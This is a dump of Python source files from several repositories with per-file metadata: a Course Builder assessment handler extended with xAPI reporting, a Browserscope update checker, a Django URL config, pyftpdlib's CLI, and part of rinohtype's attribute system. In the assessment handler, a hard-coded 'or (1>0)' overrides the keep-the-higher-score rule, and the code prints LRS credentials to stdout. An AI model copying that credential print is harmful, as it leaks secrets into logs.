repo_name | path | copies | size | text | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
daafgo/CourseBuilder-Xapi | controllers/assessments.py | 1 | 11134 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes and methods to manage all aspects of student assessments."""
__author__ = 'pgbovine@google.com (Philip Guo)'
import datetime
import logging
import httplib, urllib, logging, base64
from utils import BaseHandler
from utils import HUMAN_READABLE_DATETIME_FORMAT
import json, uuid, os
import urllib2
import base64
from controllers import lessons
from models import courses
from models import models
from models import review
from models import student_work
from models import transforms
from models import utils
from models.models import Student
from models.models import StudentAnswersEntity
from tools import verify
from google.appengine.ext import db
def store_score(course, student, assessment_type, score):
"""Stores a student's score on a particular assessment.
Args:
course: the course containing the assessment.
student: the student whose data is stored.
assessment_type: the type of the assessment.
score: the student's score on this assessment.
Returns:
the result of the assessment, if appropriate.
"""
# FIXME: Course creators can edit this code to implement custom
# assessment scoring and storage behavior
# TODO(pgbovine): Note that the latest version of answers are always saved,
# but scores are only saved if they're higher than the previous attempt.
# This can lead to unexpected analytics behavior. Resolve this.
existing_score = course.get_score(student, assessment_type)
# remember to cast to int for comparison
if (existing_score is None) or (score > int(existing_score)) or (1>0):
utils.set_score(student, assessment_type, score)
## Here we should build our JSON statement
tincan_activity_uri = os.environ.get('HTTP_REFERER', 'urn:uuid:' + str(uuid.uuid4()))
Xapi_statement = {
"id": "12345678-1234-5678-1234-567812345678",
"actor":{
"mbox":"mailto:"+student.key().name()
},
"verb":{
"id":"http://adlnet.gov/expapi/verbs/created",
"display":{
"en-US":"created"
}
},
"object":{
"id" : tincan_activity_uri,
"definition": {
"name":{
"en-US": "Multiquiz"
},
"description": {
"en-US": "multipart activity description"
}
},
},
'result': {
'completion': True,
'score': {
'scaled': 0
}
}
}
statement=json.dumps(Xapi_statement)
print(statement)
print( '%(LRS_USERNAME)s:%(LRS_PASSWORD)s' % os.environ)
connection = httplib.HTTPConnection("127.0.0.1:9000")
connection.request('POST', "/xapi/statements", statement, {
'x-experience-api-version': '1.0',
'Authorization': 'Basic ' + base64.b64encode('%(LRS_USERNAME)s:%(LRS_PASSWORD)s' % os.environ),
'content-type': 'application/json',
})
response = connection.getresponse()
print ('%s %s' % (response.status, response.reason), response.read())
connection.close()
# response = http.request('POST', 'http:127.0.0.1:7000/statements', body=statement)
# webapp.request('http:127.0.0.1:7000/statements', 'POST', statement, {'content-type': 'application/json'})
#response_stream = urllib2.urlopen(req)
#requests.post('http:127.0.0.1:9000/xapi/statements', payload=json.dumps(statement))
class AnswerHandler(BaseHandler):
"""Handler for saving assessment answers."""
# Find student entity and save answers
@db.transactional(xg=True)
def update_assessment_transaction(
self, email, assessment_type, new_answers, score):
"""Stores answer and updates user scores.
Args:
email: the student's email address.
assessment_type: the title of the assessment.
new_answers: the latest set of answers supplied by the student.
score: the numerical assessment score.
Returns:
the student instance.
"""
student = Student.get_enrolled_student_by_email(email)
course = self.get_course()
# It may be that old Student entities don't have user_id set; fix it.
if not student.user_id:
student.user_id = self.get_user().user_id()
answers = StudentAnswersEntity.get_by_key_name(student.user_id)
if not answers:
answers = StudentAnswersEntity(key_name=student.user_id)
answers.updated_on = datetime.datetime.now()
utils.set_answer(answers, assessment_type, new_answers)
store_score(course, student, assessment_type, score)
student.put()
answers.put()
# Also record the event, which is useful for tracking multiple
# submissions and history.
models.EventEntity.record(
'submit-assessment', self.get_user(), transforms.dumps({
'type': 'assessment-%s' % assessment_type,
'values': new_answers, 'location': 'AnswerHandler'}))
return student
def get(self):
"""Handles GET requests.
This method is here because if a student logs out when on the
reviewed_assessment_confirmation page, that student is redirected to
the GET method of the corresponding handler. It might be a good idea to
merge this class with lessons.AssessmentHandler, which currently only
has a GET handler.
"""
self.redirect('/course')
# pylint: disable=too-many-statements
def post(self):
"""Handles POST requests."""
student = self.personalize_page_and_get_enrolled()
if not student:
return
if not self.assert_xsrf_token_or_fail(self.request, 'assessment-post'):
return
course = self.get_course()
assessment_type = self.request.get('assessment_type')
if not assessment_type:
self.error(404)
logging.error('No assessment type supplied.')
return
unit = course.find_unit_by_id(assessment_type)
if unit is None or unit.type != verify.UNIT_TYPE_ASSESSMENT:
self.error(404)
logging.error('No assessment named %s exists.', assessment_type)
return
self.template_value['navbar'] = {'course': True}
self.template_value['assessment'] = assessment_type
self.template_value['assessment_name'] = unit.title
self.template_value['is_last_assessment'] = (
course.is_last_assessment(unit))
self.template_value['unit_id'] = unit.unit_id
# Convert answers from JSON to dict.
answers = self.request.get('answers')
answers = transforms.loads(answers) if answers else []
grader = unit.workflow.get_grader()
# Scores are not recorded for human-reviewed assignments.
score = 0
if grader == courses.AUTO_GRADER:
score = int(round(float(self.request.get('score'))))
# Record assessment transaction.
student = self.update_assessment_transaction(
student.key().name(), assessment_type, answers, score)
if grader == courses.HUMAN_GRADER:
rp = course.get_reviews_processor()
# Guard against duplicate submissions of a human-graded assessment.
previously_submitted = rp.does_submission_exist(
unit.unit_id, student.get_key())
if not previously_submitted:
# Check that the submission due date has not passed.
time_now = datetime.datetime.now()
submission_due_date = unit.workflow.get_submission_due_date()
if time_now > submission_due_date:
self.template_value['time_now'] = time_now.strftime(
HUMAN_READABLE_DATETIME_FORMAT)
self.template_value['submission_due_date'] = (
submission_due_date.strftime(
HUMAN_READABLE_DATETIME_FORMAT))
self.template_value['error_code'] = (
'assignment_deadline_exceeded')
self.render('error.html')
return
submission_key = student_work.Submission.write(
unit.unit_id, student.get_key(), answers)
rp.start_review_process_for(
unit.unit_id, submission_key, student.get_key())
# Record completion event in progress tracker.
course.get_progress_tracker().put_assessment_completed(
student, assessment_type)
self.template_value['previously_submitted'] = previously_submitted
matcher = unit.workflow.get_matcher()
self.template_value['matcher'] = matcher
if matcher == review.PEER_MATCHER:
self.template_value['review_dashboard_url'] = (
'reviewdashboard?unit=%s' % unit.unit_id
)
self.render('reviewed_assessment_confirmation.html')
return
else:
# Record completion event in progress tracker.
course.get_progress_tracker().put_assessment_completed(
student, assessment_type)
# Save the submission in the datastore, overwriting the earlier
# version if it exists.
submission_key = student_work.Submission.write(
unit.unit_id, student.get_key(), answers)
course.update_final_grades(student)
parent_unit = course.get_parent_unit(unit.unit_id)
if parent_unit:
unit_contents = lessons.UnitHandler.UnitLeftNavElements(
course, parent_unit)
next_url = unit_contents.get_url_by(
'assessment', unit.unit_id, 0) + '&confirmation'
self.redirect('/' + next_url)
else:
self.template_value['result'] = course.get_overall_result(
student)
self.template_value['score'] = score
self.template_value['overall_score'] = course.get_overall_score(
student)
self.render('test_confirmation.html')
| apache-2.0 | -1,744,682,290,816,362,200 | 38.342756 | 114 | 0.599335 | false | 4.364563 | false | false | false |
t-artistik/browserscope | third_party/check_for_updates.py | 9 | 2884 | #!/usr/bin/python2.5
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License')
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author slamm@google.com (Stephen Lamm)
import logging
import os
import re
import subprocess
def GetSubversionExternals():
subversion_externals = []
svn_cmd = ['svn', 'propget', 'svn:externals', '.']
output = subprocess.Popen(svn_cmd, stdout=subprocess.PIPE).communicate()[0]
for external_entry in output.splitlines():
if external_entry:
local_path, svn_url = external_entry.split()
if local_path.startswith('third_party/'):
subversion_externals.append((local_path, svn_url))
return dict(subversion_externals)
def GetThirdPartyDirectoriesToCheck(ignore_dirs):
ignore_dirs = set(ignore_dirs)
ignore_dirs.add('third_party/.svn')
check_dirs = []
for third_party_dir in os.listdir('third_party'):
relative_dir = 'third_party/%s' % third_party_dir
if (relative_dir not in ignore_dirs and
os.path.isdir(relative_dir)):
check_dirs.append(relative_dir)
return check_dirs
def CheckVersion(third_party_dir):
readme_file = open(os.path.join(third_party_dir, 'README.browserscope'))
print '--------------------------------------------------'
print 'Checking directory: %s' % third_party_dir
for line in readme_file.readlines():
line.strip()
match = re.match(
r'(VERSION|CHECK_VERSION|CHECK_VERSION_MANUALLY|URL):\s*(.*)', line)
if match:
readme_key, value = match.groups()
if readme_key == 'URL':
print 'URL: %s' % value
elif readme_key == 'VERSION':
print 'Local version: %s' % value
elif readme_key == 'CHECK_VERSION':
print 'Remote version:',
print subprocess.Popen(
value, shell=True, stdout=subprocess.PIPE).communicate()[0].strip()
else:
print 'Check manually: %s' % value
print
if __name__ == '__main__':
if 'third_party' not in os.listdir('.'):
os.chdir('..')
if 'third_party' not in os.listdir('.'):
logging.error('Must run from the application root.')
subversion_externals = GetSubversionExternals()
for skipping_dirs in sorted(subversion_externals.keys()):
print "Skipping directory managed by svn:externals: %s" % skipping_dirs
check_dirs = GetThirdPartyDirectoriesToCheck(subversion_externals.keys())
for third_party_dir in check_dirs:
CheckVersion(third_party_dir)
| apache-2.0 | 2,495,092,349,654,564,400 | 35.05 | 79 | 0.675451 | false | 3.673885 | false | false | false |
mostafamosly/Uraeus | Small/Small/urls.py | 1 | 2153 | from django.conf.urls import patterns, include, url
from django.contrib import admin
from Small import views
from .views import *
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
#from core.views import shop
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from core.views import shop
from django.conf import settings
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^accounting/',include('accounting.urls')),
url(r'^core/',include('core.urls')),
#url(r'^purchase/',include('purchase.urls')),
url(r'^product/',include('product.urls')),
url(r'^warehouse/',include('warehouse.urls')),
url(r'^procurement/',include('procurement.urls')),
# url(r'^fulfillment/',include('fulfillment.urls')),
url(r'^$', Home.as_view(), name="home"),
url(r'^index$', Home.as_view(), name="home"),
url(r'^pricing$', Pricing.as_view(), name="pricing"),
url(r'^services$', Services.as_view(), name="services"),
url(r'^about$', About.as_view(), name="about"),
url(r'^profile$', views.Profile, name='profile'),
url(r'^$', Home.as_view(), name="home"),
url(r'^index$', Home.as_view(), name="home"),
url(r'^pricing$', Pricing.as_view(), name="pricing"),
url(r'^services$', Services.as_view(), name="services"),
url(r'^about$', About.as_view(), name="about"),
url(r'^accounts/', include('registration.backends.default.urls')),
)
urlpatterns += patterns('django.contrib.auth.views',
url(r'^login/$', 'login',
{'template_name': 'registration/login.html'},
name = 'login'
),
url(r'^logout/$', 'logout',
{'template_name': 'registration/logout.html'},
name = 'logout'
),
)
urlpatterns += staticfiles_urlpatterns()
if settings.DEBUG:
urlpatterns += patterns('',
url(r'^media/(?P<path>.*)$',
'django.views.static.serve',
{'document_root': settings.MEDIA_ROOT, }),
)
| gpl-3.0 | 8,056,116,137,476,029,000 | 31.621212 | 73 | 0.587088 | false | 3.858423 | false | true | false |
aliyun/oss-ftp | python27/win32/Lib/site-packages/pyftpdlib/__main__.py | 4 | 3808 | # Copyright (C) 2007-2016 Giampaolo Rodola' <g.rodola@gmail.com>.
# Use of this source code is governed by MIT license that can be
# found in the LICENSE file.
"""
Start a stand alone anonymous FTP server from the command line as in:
$ python -m pyftpdlib
"""
import logging
import optparse
import os
import sys
from . import __ver__
from ._compat import getcwdu
from .authorizers import DummyAuthorizer
from .handlers import FTPHandler
from .log import config_logging
from .servers import FTPServer
class CustomizedOptionFormatter(optparse.IndentedHelpFormatter):
"""Formats options shown in help in a prettier way."""
def format_option(self, option):
result = []
opts = self.option_strings[option]
result.append(' %s\n' % opts)
if option.help:
help_text = ' %s\n\n' % self.expand_default(option)
result.append(help_text)
return ''.join(result)
def main():
"""Start a stand alone anonymous FTP server."""
usage = "python -m pyftpdlib [options]"
parser = optparse.OptionParser(usage=usage, description=main.__doc__,
formatter=CustomizedOptionFormatter())
parser.add_option('-i', '--interface', default=None, metavar="ADDRESS",
help="specify the interface to run on (default all "
"interfaces)")
parser.add_option('-p', '--port', type="int", default=2121, metavar="PORT",
help="specify port number to run on (default 2121)")
parser.add_option('-w', '--write', action="store_true", default=False,
help="grants write access for the anonymous user "
"(default read-only)")
parser.add_option('-d', '--directory', default=getcwdu(), metavar="FOLDER",
help="specify the directory to share (default current "
"directory)")
parser.add_option('-n', '--nat-address', default=None, metavar="ADDRESS",
help="the NAT address to use for passive connections")
parser.add_option('-r', '--range', default=None, metavar="FROM-TO",
help="the range of TCP ports to use for passive "
"connections (e.g. -r 8000-9000)")
parser.add_option('-v', '--version', action='store_true',
help="print pyftpdlib version and exit")
parser.add_option('-V', '--verbose', action='store_true',
help="activate a more verbose logging")
options, args = parser.parse_args()
if options.version:
sys.exit("pyftpdlib %s" % __ver__)
if options.verbose:
config_logging(level=logging.DEBUG)
passive_ports = None
if options.range:
try:
start, stop = options.range.split('-')
start = int(start)
stop = int(stop)
except ValueError:
parser.error('invalid argument passed to -r option')
else:
passive_ports = list(range(start, stop + 1))
# On recent Windows versions, if address is not specified and IPv6
# is installed the socket will listen on IPv6 by default; in this
# case we force IPv4 instead.
if os.name in ('nt', 'ce') and not options.interface:
options.interface = '0.0.0.0'
authorizer = DummyAuthorizer()
perm = options.write and "elradfmwM" or "elr"
authorizer.add_anonymous(options.directory, perm=perm)
handler = FTPHandler
handler.authorizer = authorizer
handler.masquerade_address = options.nat_address
handler.passive_ports = passive_ports
ftpd = FTPServer((options.interface, options.port), FTPHandler)
try:
ftpd.serve_forever()
finally:
ftpd.close_all()
if __name__ == '__main__':
main()
| mit | -1,431,102,941,654,268,400 | 37.857143 | 79 | 0.609244 | false | 4.081458 | false | false | false |
lehtolav/distributed-face-recognition | pi side/messager.py | 1 | 2766 | # Trades messages with a remote host/client
# Essentially provides a layer to transform generic socket datastreams
# into messages (strings) with messagetypes
# Messagetype will be used to invoke a registered callback for that type
# with the message content as its argument
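# A minimal usage sketch (hypothetical address, port, message type and callback;
# not part of the original module):
#   m = Messager()
#   m.setupHost('0.0.0.0', 5000)
#   m.register('hello', lambda sock, msg: send_message(sock, 'hello-ack', msg))
#   while True:
#       m.processHost()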
import socket
import select
import struct
mode = "I"
length_size = struct.calcsize(mode)
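# Wire format used by recv_message/send_message below: each message is framed as
#   [length of messagetype][messagetype bytes][length of message][message bytes]
# where both lengths are packed with struct format "I" (native unsigned int,
# typically 4 bytes).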
def recv_message(sock):
data = sock.recv(length_size, socket.MSG_WAITALL)
if not data:
return None, None
msg_size = struct.unpack(mode, data)[0]
messagetype = ''
if msg_size > 0:
messagetype = sock.recv(msg_size, socket.MSG_WAITALL)
data = sock.recv(length_size, socket.MSG_WAITALL)
msg_size = struct.unpack(mode, data)[0]
message = ''
if msg_size > 0:
message = sock.recv(msg_size, socket.MSG_WAITALL)
print messagetype
return messagetype, message
def send_message(sock, messagetype, message):
try:
mtl = struct.pack(mode, len(messagetype))
mcl = struct.pack(mode, len(message))
sock.sendall(mtl + messagetype + mcl + message)
except socket.error, e:
print 'Error sending data'
print e
class Messager():
def __init__(self):
self.clients = []
self.callbacks = dict()
self.listening = False
def __del__(self):
if self.listening:
self.hostSock.close()
for sock in self.clients:
sock.close()
def setupHost(self, address, port):
self.hostSock = socket.socket()
self.hostSock.bind((address, port))
self.hostSock.listen(5)
self.hostSock.setblocking(0)
self.listening = True
def processHost(self):
try:
if self.listening:
conn, address = self.hostSock.accept()
self.clients.append(conn)
except socket.timeout:
pass
except socket.error, e:
if e[0] == 11:
pass
else:
print e
inputs, outputs, errors = select.select(self.clients, [], self.clients, 0)
for sock in inputs:
messagetype, message = recv_message(sock)
if messagetype is None:
self.clients.remove(sock)
sock.close()
elif messagetype in self.callbacks:
self.callbacks[messagetype](sock, message)
for sock in errors:
self.clients.remove(sock)
sock.close()
# def send(self, target, messagetype, message):
# pass
def register(self, messagetype, callback):
self.callbacks[messagetype] = callback
def unregister(self, messagetype):
del self.callbacks[messagetype]
def connect(self, remoteHost, remotePort):
# Connect to a remote host and add its socket to the client list
# i.e. we don't listen for connection, but initiate it
#This allows two-way communication between two messager objects
sock = socket.socket()
sock.connect((remoteHost, remotePort))
self.clients.append(sock)
return sock
| mit | 7,856,820,791,128,280,000 | 27.22449 | 76 | 0.686551 | false | 3.150342 | false | false | false |
ssinger/skytools-cvs | python/pgqadm.py | 1 | 5673 | #! /usr/bin/env python
"""PgQ ticker and maintenance.
"""
import sys
import skytools
from pgq.ticker import SmartTicker
from pgq.status import PGQStatus
#from pgq.admin import PGQAdmin
"""TODO:
pgqadm ini check
"""
command_usage = """
%prog [options] INI CMD [subcmd args]
commands:
ticker start ticking & maintenance process
status show overview of queue health
install install code into db
create QNAME create queue
drop QNAME drop queue
register QNAME CONS install code into db
unregister QNAME CONS install code into db
config QNAME [VAR=VAL] show or change queue config
"""
config_allowed_list = {
'queue_ticker_max_count': 'int',
'queue_ticker_max_lag': 'interval',
'queue_ticker_idle_period': 'interval',
'queue_rotation_period': 'interval',
}
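# Example invocation (hypothetical ini file and queue name):
#   pgqadm.py ticker.ini config my_queue queue_ticker_max_count=500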
class PGQAdmin(skytools.DBScript):
def __init__(self, args):
skytools.DBScript.__init__(self, 'pgqadm', args)
self.set_single_loop(1)
if len(self.args) < 2:
print "need command"
sys.exit(1)
int_cmds = {
'create': self.create_queue,
'drop': self.drop_queue,
'register': self.register,
'unregister': self.unregister,
'install': self.installer,
'config': self.change_config,
}
cmd = self.args[1]
if cmd == "ticker":
script = SmartTicker(args)
elif cmd == "status":
script = PGQStatus(args)
elif cmd in int_cmds:
script = None
self.work = int_cmds[cmd]
else:
print "unknown command"
sys.exit(1)
if self.pidfile:
self.pidfile += ".admin"
self.run_script = script
def start(self):
if self.run_script:
self.run_script.start()
else:
skytools.DBScript.start(self)
def init_optparse(self, parser=None):
p = skytools.DBScript.init_optparse(self, parser)
p.set_usage(command_usage.strip())
return p
def installer(self):
objs = [
skytools.DBLanguage("plpgsql"),
skytools.DBFunction("txid_current_snapshot", 0, sql_file="txid.sql"),
skytools.DBSchema("pgq", sql_file="pgq.sql"),
]
db = self.get_database('db')
curs = db.cursor()
skytools.db_install(curs, objs, self.log)
db.commit()
def create_queue(self):
qname = self.args[2]
self.log.info('Creating queue: %s' % qname)
self.exec_sql("select pgq.create_queue(%s)", [qname])
def drop_queue(self):
qname = self.args[2]
self.log.info('Dropping queue: %s' % qname)
self.exec_sql("select pgq.drop_queue(%s)", [qname])
def register(self):
qname = self.args[2]
cons = self.args[3]
self.log.info('Registering consumer %s on queue %s' % (cons, qname))
self.exec_sql("select pgq.register_consumer(%s, %s)", [qname, cons])
def unregister(self):
qname = self.args[2]
cons = self.args[3]
self.log.info('Unregistering consumer %s from queue %s' % (cons, qname))
self.exec_sql("select pgq.unregister_consumer(%s, %s)", [qname, cons])
def change_config(self):
if len(self.args) < 3:
list = self.get_queue_list()
for qname in list:
self.show_config(qname)
return
qname = self.args[2]
if len(self.args) == 3:
self.show_config(qname)
return
alist = []
for el in self.args[3:]:
k, v = el.split('=')
if k not in config_allowed_list:
qk = "queue_" + k
if qk not in config_allowed_list:
raise Exception('unknown config var: '+k)
k = qk
expr = "%s=%s" % (k, skytools.quote_literal(v))
alist.append(expr)
self.log.info('Change queue %s config to: %s' % (qname, ", ".join(alist)))
sql = "update pgq.queue set %s where queue_name = %s" % (
", ".join(alist), skytools.quote_literal(qname))
self.exec_sql(sql, [])
def exec_sql(self, q, args):
self.log.debug(q)
db = self.get_database('db')
curs = db.cursor()
curs.execute(q, args)
db.commit()
def show_config(self, qname):
fields = []
for f, kind in config_allowed_list.items():
if kind == 'interval':
sql = "extract('epoch' from %s)::text as %s" % (f, f)
fields.append(sql)
else:
fields.append(f)
klist = ", ".join(fields)
q = "select " + klist + " from pgq.queue where queue_name = %s"
db = self.get_database('db')
curs = db.cursor()
curs.execute(q, [qname])
res = curs.dictfetchone()
db.commit()
if res is None:
print "no such queue:", qname
return
print qname
for k in config_allowed_list:
n = k
if k[:6] == "queue_":
n = k[6:]
print " %s\t=%7s" % (n, res[k])
def get_queue_list(self):
db = self.get_database('db')
curs = db.cursor()
curs.execute("select queue_name from pgq.queue order by 1")
rows = curs.fetchall()
db.commit()
list = []
for r in rows:
list.append(r[0])
return list
if __name__ == '__main__':
script = PGQAdmin(sys.argv[1:])
script.start()
| isc | -5,971,504,502,442,351,000 | 27.651515 | 82 | 0.52459 | false | 3.631882 | true | false | false |
mick-d/nipype | nipype/interfaces/niftyseg/base.py | 2 | 1612 | # -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
The niftyseg module provides classes for interfacing with `niftyseg
<https://sourceforge.net/projects/niftyseg/>`_ command line tools.
These are the base tools for working with niftyseg.
EM Statistical Segmentation tool is found in niftyseg/em.py
Fill lesions tool is found in niftyseg/lesions.py
Mathematical operation tool is found in niftyseg/maths.py
Patch Match tool is found in niftyseg/patchmatch.py
Statistical operation tool is found in niftyseg/stats.py
Label Fusion and CalcTopNcc tools are in niftyseg/steps.py
Examples
--------
See the docstrings of the individual classes for examples.
"""
from __future__ import print_function, division, unicode_literals, absolute_import
from ..niftyreg.base import no_nifty_package
from ..niftyfit.base import NiftyFitCommand
import subprocess
import warnings
warn = warnings.warn
warnings.filterwarnings('always', category=UserWarning)
class NiftySegCommand(NiftyFitCommand):
"""
Base support interface for NiftySeg commands.
"""
_suffix = '_ns'
_min_version = None
def __init__(self, **inputs):
super(NiftySegCommand, self).__init__(**inputs)
def get_version(self):
if no_nifty_package(cmd=self.cmd):
return None
# exec_cmd = ''.join((self.cmd, ' --version'))
exec_cmd = 'seg_EM --version'
# Using seg_EM for version (e.g. seg_stats --version doesn't work)
return subprocess.check_output(exec_cmd, shell=True).strip('\n')
| bsd-3-clause | 1,078,164,674,367,968,600 | 33.297872 | 82 | 0.708437 | false | 3.393684 | false | false | false |
brechtm/rinohtype | src/rinoh/attribute.py | 1 | 20698 | # This file is part of rinohtype, the Python document preparation system.
#
# Copyright (c) Brecht Machiels.
#
# Use of this source code is subject to the terms of the GNU Affero General
# Public License v3. See the LICENSE file or http://www.gnu.org/licenses/.
import re
from collections import OrderedDict
from configparser import ConfigParser
from io import StringIO
from itertools import chain
from pathlib import Path
from token import NUMBER, ENDMARKER, MINUS, PLUS, NAME, NEWLINE
from tokenize import generate_tokens
from warnings import warn
from .util import (NamedDescriptor, WithNamedDescriptors,
NotImplementedAttribute, class_property, PeekIterator,
cached)
__all__ = ['AttributeType', 'AcceptNoneAttributeType', 'OptionSet',
'OptionSetMeta', 'Attribute', 'OverrideDefault',
'AttributesDictionary', 'Configurable', 'RuleSet', 'RuleSetFile',
'Bool', 'Integer', 'ParseError', 'Var']
class AttributeType(object):
def __eq__(self, other):
return type(self) == type(other) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
@classmethod
def check_type(cls, value):
return isinstance(value, cls)
@classmethod
def from_string(cls, string, source=None):
return cls.parse_string(string, source)
@classmethod
def parse_string(cls, string, source):
tokens = TokenIterator(string)
value = cls.from_tokens(tokens, source)
if next(tokens).type != ENDMARKER:
raise ParseError('Syntax error')
return value
@classmethod
def from_tokens(cls, tokens, source):
raise NotImplementedError(cls)
@classmethod
def validate(cls, value):
if isinstance(value, str):
value = cls.from_string(value)
if not cls.check_type(value):
raise TypeError("{} is not of type {}".format(value, cls.__name__))
return value
@classmethod
def doc_repr(cls, value):
return '``{}``'.format(value) if value else '(no value)'
@classmethod
def doc_format(cls):
warn('Missing implementation for {}.doc_format'.format(cls.__name__))
return ''
class AcceptNoneAttributeType(AttributeType):
"""Accepts 'none' (besides other values)"""
@classmethod
def check_type(cls, value):
return (isinstance(value, type(None))
or super(__class__, cls).check_type(value))
@classmethod
def from_string(cls, string, source=None):
if string.strip().lower() == 'none':
return None
return super(__class__, cls).from_string(string, source)
@classmethod
def doc_repr(cls, value):
return '``{}``'.format('none' if value is None else value)
class OptionSetMeta(type):
def __new__(metacls, classname, bases, cls_dict):
cls = super().__new__(metacls, classname, bases, cls_dict)
cls.__doc__ = (cls_dict['__doc__'] + '\n\n'
if '__doc__' in cls_dict else '')
cls.__doc__ += 'Accepts: {}'.format(cls.doc_format())
return cls
def __getattr__(cls, item):
if item == 'NONE' and None in cls.values:
return None
string = item.lower().replace('_', ' ')
if item.isupper() and string in cls.values:
return string
raise AttributeError(item)
def __iter__(cls):
return iter(cls.values)
class OptionSet(AttributeType, metaclass=OptionSetMeta):
"""Accepts the values listed in :attr:`values`"""
values = ()
@classmethod
def check_type(cls, value):
return value in cls.values
@class_property
def value_strings(cls):
return ['none' if value is None else value.lower()
for value in cls.values]
@classmethod
def _value_from_tokens(cls, tokens):
if tokens.next.type != NAME:
raise ParseError('Expecting a name')
token = next(tokens)
_, start_col = token.start
while tokens.next and tokens.next.exact_type in (NAME, MINUS):
token = next(tokens)
_, end_col = token.end
return token.line[start_col:end_col].strip()
@classmethod
def from_tokens(cls, tokens, source):
option_string = cls._value_from_tokens(tokens)
try:
index = cls.value_strings.index(option_string.lower())
except ValueError:
raise ValueError("'{}' is not a valid {}. Must be one of: '{}'"
.format(option_string, cls.__name__,
"', '".join(cls.value_strings)))
return cls.values[index]
@classmethod
def doc_repr(cls, value):
return '``{}``'.format(value)
@classmethod
def doc_format(cls):
return ', '.join('``{}``'.format(s) for s in cls.value_strings)
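# A minimal example subclass (hypothetical, not part of this module): values are
# matched case-insensitively when parsed from strings and exposed as upper-case
# class attributes.
#
#   class HorizontalAlignment(OptionSet):
#       values = 'left', 'center', 'right'
#
#   HorizontalAlignment.LEFT                     # -> 'left'
#   HorizontalAlignment.from_string('Center')    # -> 'center'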
class Attribute(NamedDescriptor):
"""Descriptor used to describe a style attribute"""
def __init__(self, accepted_type, default_value, description):
self.name = None
self.accepted_type = accepted_type
self.default_value = accepted_type.validate(default_value)
self.description = description
self.source = None
def __get__(self, style, type=None):
try:
return style.get(self.name, self.default_value)
except AttributeError:
return self
def __set__(self, style, value):
if not self.accepted_type.check_type(value):
raise TypeError('The {} attribute only accepts {} instances'
.format(self.name, self.accepted_type.__name__))
style[self.name] = value
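# A minimal sketch (hypothetical subclass names) of how these descriptors are
# declared on an AttributesDictionary subclass defined elsewhere:
#
#   class MyOptions(AttributesDictionary):
#       draft = Attribute(Bool, False, 'Produce draft output')
#       columns = Attribute(Integer, 1, 'Number of text columns')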
class OverrideDefault(Attribute):
"""Overrides the default value of an attribute defined in a superclass"""
def __init__(self, default_value):
self._default_value = default_value
@property
def overrides(self):
return self._overrides
@overrides.setter
def overrides(self, attribute):
self._overrides = attribute
self.default_value = self.accepted_type.validate(self._default_value)
@property
def accepted_type(self):
return self.overrides.accepted_type
@property
def description(self):
return self.overrides.description
class WithAttributes(WithNamedDescriptors):
def __new__(mcls, classname, bases, cls_dict):
attributes = cls_dict['_attributes'] = OrderedDict()
doc = []
for name, attr in cls_dict.items():
if not isinstance(attr, Attribute):
continue
attributes[name] = attr
if isinstance(attr, OverrideDefault):
for mro_cls in (cls for base_cls in bases
for cls in base_cls.__mro__):
try:
attr.overrides = mro_cls._attributes[name]
break
except (AttributeError, KeyError):
pass
else:
raise NotImplementedError
battr = ':attr:`{0} <.{0}.{1}>`'.format(mro_cls.__name__, name)
inherits = f' (inherited from {battr})'
overrides = f' (overrides {battr} default)'
else:
inherits = overrides = ''
doc.append('{}: {}{}'.format(name, attr.description, inherits))
format = attr.accepted_type.doc_format()
default = attr.accepted_type.doc_repr(attr.default_value)
doc.append('\n *Accepts* :class:`.{}`: {}\n'
.format(attr.accepted_type.__name__, format))
doc.append('\n *Default*: {}{}\n'
.format(default, overrides))
supported_attributes = list(name for name in attributes)
documented = set(supported_attributes)
for base_class in bases:
try:
supported_attributes.extend(base_class._supported_attributes)
except AttributeError:
continue
for mro_cls in base_class.__mro__:
for name, attr in getattr(mro_cls, '_attributes', {}).items():
if name in documented:
continue
doc.append('{0}: {1} (inherited from :attr:`{2} <.{2}.{0}>`)'
.format(name, attr.description,
mro_cls.__name__))
format = attr.accepted_type.doc_format()
default = attr.accepted_type.doc_repr(attr.default_value)
doc.append('\n *Accepts* :class:`.{}`: {}\n'
.format(attr.accepted_type.__name__, format))
doc.append('\n *Default*: {}\n'.format(default))
documented.add(name)
if doc:
attr_doc = '\n '.join(chain([' Attributes:'], doc))
cls_dict['__doc__'] = (cls_dict.get('__doc__', '') + '\n\n'
+ attr_doc)
cls_dict['_supported_attributes'] = supported_attributes
return super().__new__(mcls, classname, bases, cls_dict)
@property
def _all_attributes(cls):
for mro_class in reversed(cls.__mro__):
for name in getattr(mro_class, '_attributes', ()):
yield name
@property
def supported_attributes(cls):
for mro_class in cls.__mro__:
for name in getattr(mro_class, '_supported_attributes', ()):
yield name
class AttributesDictionary(OrderedDict, metaclass=WithAttributes):
def __init__(self, base=None, **attributes):
self.name = None
self.source = None
self.base = base
super().__init__(attributes)
@classmethod
def _get_default(cls, attribute):
"""Return the default value for `attribute`.
If no default is specified in this style, get the default from the
nearest superclass.
If `attribute` is not supported, raise a :class:`KeyError`."""
try:
for klass in cls.__mro__:
if attribute in klass._attributes:
return klass._attributes[attribute].default_value
except AttributeError:
raise KeyError("No attribute '{}' in {}".format(attribute, cls))
@classmethod
def attribute_definition(cls, name):
